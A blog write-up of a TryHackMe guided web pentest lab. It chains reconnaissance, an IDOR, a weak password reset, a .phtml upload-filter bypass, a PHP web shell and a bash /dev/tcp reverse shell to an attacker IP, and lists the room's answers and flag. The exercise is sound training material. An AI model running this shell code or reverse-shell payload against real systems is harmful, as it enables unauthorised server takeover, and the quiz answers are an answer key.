Post

Guided Pentest Web

Penetration Testing Foundations 1/5

Posted
By Nathan Garcia
2 min read
Guided Pentest Web

Task 1 Introduction

No answer needed

Task 2 Reconnaissance and Enumeration

1
2
3
4

>tgt=10.67.138.108
>nmap -sV -sC -p- $tgt
>curl -I $tgt
>gobuster dir -u $tgt -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x php

We see 4 ports open: 22, 80, 3306, and 8080. The header confirms Apache 2.4.58 and PHP are in use.

There are some interesting site directories in use:

  • /admin
  • /api
  • /reset.php
  • /uploads
  • /profile.php
  • /dashboard.php

Browse to http://10.67.138.108/api/ to view endpoints:

  • user
  • jobs
  • applications

What version of the Apache server is running? 2.4.58

What database service is running on the target? MySQL

What is the path to the password reset page? /reset.php

Task 3 IDOR

Navigate to the profile page. The url should look like http://10.67.138.108/profile.php?id=6.

Change the id to see if the site is susceptible to an IDOR attack.

curl -s "http://$tgt/api/user?id=1"

What is the name of the administrator user? Sarah Mitchell

What role does James Crawford hold? hiring_manager

Task 4 Weak Password Reset

With the administrator email s.mitchell@recruitx.thm, we should use /reset.php to reset the password.

How many digits long is the reset token? 6

After resetting the password for s.mitchell@recruitx.thm and logging in, what role is displayed for that account in the dashboard? Administrator

Task 5 Admin Panel Access

Now we can access the admin panel at /admin/upload.php.

We can test upload verification by changing the file extension to a lesser known php format.

echo '<?php echo "PHP is executing"; ?>' > test.phtml

What is the name of the PHP file responsible for handling file upload in the RecruitX web app? upload.php

What HTML attribute on the file input is used to restrict selectable file extensions on the client side? accept

Which alternative PHP extension bypassed the upload filter? .phtml

Task 6 Remote Code Execution

Create shell.phtml and upload it to the admin panel.

1
2
3
4
5

<?php
if(isset($_GET['cmd'])) {
    echo "<pre>" . shell_exec($_GET['cmd']) . "</pre>";
}
?>

Verify it’s working with curl "http://10.67.138.108/uploads/documents/shell.phtml?cmd=id"

Next create a listener on the attacking system: nc -lvnp 4444

Run the attack curl "http://10.67.138.108/uploads/documents/shell.phtml?cmd=bash+-c+'bash+-i+>%26+/dev/tcp/10.67.107.60/4444+0>%261'"

Switch to the netcat tab to answer the questions.

What user is the web shell running as? www-data

What is the hostname of the target server? recruitx-prod

What is the flag? THM{ch41n3d_vulns_4r3_d3v4st4t1ng}

Task 7 The Attack Chain

How many distinct vulnerabilities were chained together in this engagement? 4

What approach should be used instead of a blocklist when validating file uploads? allowlist

Task 8 Conclusion

No answer needed

TryHackMe
jr penetration tester path
This post is licensed under CC BY 4.0 by the author.